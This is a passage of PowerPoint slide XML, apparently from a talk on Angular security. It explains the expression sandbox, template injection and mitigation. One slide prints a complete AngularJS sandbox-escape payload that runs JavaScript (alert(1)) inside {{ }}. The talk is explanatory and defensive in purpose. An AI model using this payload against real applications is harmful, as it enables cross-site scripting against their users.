              <a:rPr lang="en-CA" altLang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1200" dirty="0"/>
              <a:t>web storage, CSP, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>…)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="270000" lvl="1" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-CA" altLang="fr-FR" sz="5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3888" y="1995686"/>
            <a:ext cx="5286903"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541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30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="151200" y="204550"/>
            <a:ext cx="6653048"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800" dirty="0" smtClean="0"/>
              <a:t>	      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Expression sandbox</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07504" y="987574"/>
            <a:ext cx="9001000" cy="3960440"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" altLang="fr-FR" sz="1400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>overview</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="fr-FR" sz="1400" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Expression sandbox is a mechanism that checks Angular expressions inside </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>{{}}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>expressions are evaluated in your html. For example, {{1+1}} renders at 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>to support the basic logic that is necessary to be able to render the user interface </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>allow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>a limited subset of JavaScript inside templates </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>/ prevent accessing global objects (window, …)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t>Not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>intented</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>purpose</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0"/>
              <a:t>But </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1"/>
              <a:t>developers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0"/>
              <a:t> tend to use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1"/>
              <a:t>it</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0"/>
              <a:t> as a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1"/>
              <a:t>secure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1"/>
              <a:t>sandbox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1"/>
              <a:t>which</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0"/>
              <a:t> not !)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" altLang="fr-FR" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="285359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31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="151200" y="204550"/>
            <a:ext cx="6653048"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800" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Template injection</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07504" y="843558"/>
            <a:ext cx="9001000" cy="3960440"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" altLang="fr-FR" sz="400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
              <a:t>Exploits an expression sandbox vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" altLang="fr-FR" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" altLang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" altLang="fr-FR" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" altLang="fr-FR" sz="1400" dirty="0"/>
              <a:t>There </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="fr-FR" sz="1400" dirty="0"/>
              <a:t> no </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>safe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="fr-FR" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>way</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="fr-FR" sz="1400" dirty="0"/>
              <a:t> to do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="fr-FR" sz="1400" dirty="0"/>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="fr-FR" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>Angular</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" altLang="fr-FR" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="fr-FR" sz="1400" dirty="0" smtClean="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1440160"/>
            <a:ext cx="3593492" cy="78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1368152"/>
            <a:ext cx="2298388" cy="999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968" y="1584176"/>
            <a:ext cx="1972705" cy="527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2736304"/>
            <a:ext cx="4455486" cy="1995686"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln/>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="3">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="3">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="ZoneTexte 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="539552" y="2864638"/>
            <a:ext cx="3888432"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800" dirty="0"/>
              <a:t>{{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>    c=''.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>sub.call;b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>=''.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>sub.bind;a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>=''.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>sub.apply</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>c.$apply</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>=$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>apply;c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>.$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>b;op</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>=$root.$$phase;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>    $root.$$phase=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>null;od</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>=$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>root.$digest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>;$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>root.$digest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>=({}).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>toString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>    C=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>c.$apply</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>(c);$root.$$phase=op;$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>root.$digest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>=od;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>    B=C(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>b,c,b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>);$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>evalAsync</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>("</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>astNode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>=pop();</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>astNode.type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>UnaryExpression</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>astNode.operator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>='(window.X?void0:(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>window.X</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>true,alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>(1)))+';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>astNode.argument</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>={</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>type:'Identifier',name:'foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>'};</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>    ");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>    m1=B($$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>asyncQueue.pop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>().</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>expression,null,$root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>    m2=B(C,null,m1);[].</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>push.apply</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>=m2;a=''.sub;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>    $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>('a(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>b.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>)');[].</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>push.apply</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>=a;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>  }}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="342229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32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="151200" y="204550"/>
            <a:ext cx="6653048"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600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Template </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>injection M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>itigation</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07504" y="987574"/>
            <a:ext cx="9001000" cy="3960440"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
              <a:t>Don’t mix server-side templating with Angular</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="0">
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="2" indent="-285750">
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1400" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="2" indent="-285750">
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="2" indent="-285750">
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1400" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="2" indent="-285750">
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="2" indent="-285750">
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1400" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="2" indent="-285750">
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
              <a:defRPr/>
